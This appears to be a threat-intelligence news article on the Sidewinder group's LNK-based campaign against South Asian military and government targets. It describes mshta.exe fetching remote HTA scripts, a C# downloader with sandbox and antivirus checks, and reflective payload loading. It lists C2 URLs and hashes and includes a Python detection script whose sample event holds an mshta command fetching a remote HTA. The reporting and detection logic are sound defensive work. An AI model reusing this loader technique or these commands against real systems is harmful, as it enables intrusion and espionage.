Sidewinder Hacker Group Exploits LNK Files to Deploy Malicious Scripts

In a new wave of espionage activity, APT-C-24, also known as Sidewinder or Rattlesnake, has shifted tactics to leverage Windows shortcut (.LNK) files for remote script execution.

Discovered by the 360 Advanced Threat Research Institute, the campaign targets critical South Asian infrastructure and government entities, including Nepalese and Sri Lankan military networks, by packaging three malicious LNK files within a compressed archive to maximize infection probability.

When a victim opens any of the embedded shortcuts (file 1.docx.lnk, file 2.docx.lnk, or file 3 3 3.docx.lnk), the LNK invokes mshta.exe to fetch and execute an HTML Application (HTA) from an attacker-controlled server. Each URL ends with the parameter yui=0, 1, or 2, which distinguishes the three variants but does not change their functionality. For example, the “file 2.docx.lnk” sample (MD5 14632adccc9620b66ac4a3c52946f8c4) directs mshta.exe to load “34016917-New_1” from https://policy.mail163cn.info/36287654-New?yui=1.

Upon execution, the HTA script unpacks an obfuscated payload into %TEMP%\file 2.docx. Rather than decoding immediately, the script defers deobfuscation to a subsequent C# downloader component.

After base64 decoding and decompression, the downloader performs environmental checks via WMI: it queries Win32_Processor for core count and only proceeds if the system has two or more cores.

A memory size check ensures the host has at least 810 MB of RAM before .NET deserialization loads the next stage into memory.

Multi-Layered Obfuscation and Environmental Safeguards

The C# downloader (MD5 2e382c82d055e6e3a5feb9095d759735) is packed with numerous anti-analysis techniques.

It surveys running processes for known security software such as Kaspersky and ESET, then appends the detected product name as a query parameter (e.g., ?p=&w=Kaspersky) to its C2 URL at https://policy.mail163cn.info/46785583-New.

Although the callback yields no visible response, this likely serves to fingerprint the victim’s antivirus environment.

If the initial payload file exists, the downloader base64-decodes and decompresses it, then launches the benign-looking document to distract the user.

Finally, it retrieves the actual follow-on payload from https://policy.mail163cn.info/08395961-New, XOR-decrypts the data, and reflectively loads it into memory. Rapid C2 rotation and regional filtering prevent researchers from capturing the full suite of tools deployed in specific target environments.

The domain selection and URL conventions, including character strings like “nepalarmy”, “army-lk”, “aliyumm”, 6- or 8-digit numeric prefixes, and the repeated use of “yui” parameters, mirror Sidewinder’s established infrastructure.

Shared IP resolutions and identical HTTP header behaviors further cement the attribution to this APT group.

Sidewinder’s evolution away from leveraging Office formula-editor exploits (e.g., CVE-2017-0199 and CVE-2017-11882) toward LNK-based script loaders underscores its commitment to maintaining stealth and versatility.

Organizations in government, energy, defense, and mining sectors must tighten endpoint defenses, enforce strict attachment-handling policies, and implement behavior-based monitoring to detect unusual mshta.exe invocations and memory-only payloads.
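Detection logic along the lines recommended above, as an added example that is not code from the 360 report or this article: it scans constructed Sysmon-style process-creation events for mshta.exe launched with a remote URL rather than a local .hta, and additionally notes the 6/8-digit "-New" path shape and the yui parameter the article attributes to this campaign. The field names and sample events are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed process-creation events in Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://policy.mail163cn.info/36287654-New?yui=1'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\winword.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\winword.exe" "C:\Users\u\file 2.docx"'},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Path shape reported for this campaign: 6- or 8-digit numeric prefix followed by "-New".
CAMPAIGN_PATH_RE = re.compile(r"^/(\d{6}|\d{8})-New", re.IGNORECASE)

def assess_event(event):
    """Return (is_suspicious, reasons) for one process-creation event."""
    reasons = []
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return False, reasons
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    if urls:
        reasons.append("mshta.exe given a remote URL instead of a local .hta")
        parsed = urlparse(urls[0].strip('"'))
        if CAMPAIGN_PATH_RE.match(parsed.path):
            reasons.append("URL path matches the 6/8-digit '-New' convention")
        if "yui" in parse_qs(parsed.query):
            reasons.append("query carries the 'yui' variant parameter")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe" and urls:
        reasons.append("launched from explorer.exe, consistent with a double-clicked LNK")
    return bool(urls), reasons

def hunt(events):
    """Return (command line, reasons) for every event that looks like a remote-HTA loader."""
    hits = []
    for ev in events:
        suspicious, reasons = assess_event(ev)
        if suspicious:
            hits.append((ev["CommandLine"], reasons))
    return hits
```

Only the first sample event is flagged; a locally sourced .hta and an ordinary document launch pass through, so the rule keys on the remote fetch rather than on mshta.exe alone.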

Continuous threat hunting and robust patch management remain essential to thwarting these sophisticated, memory-resident intrusions.

IOC

MD5:

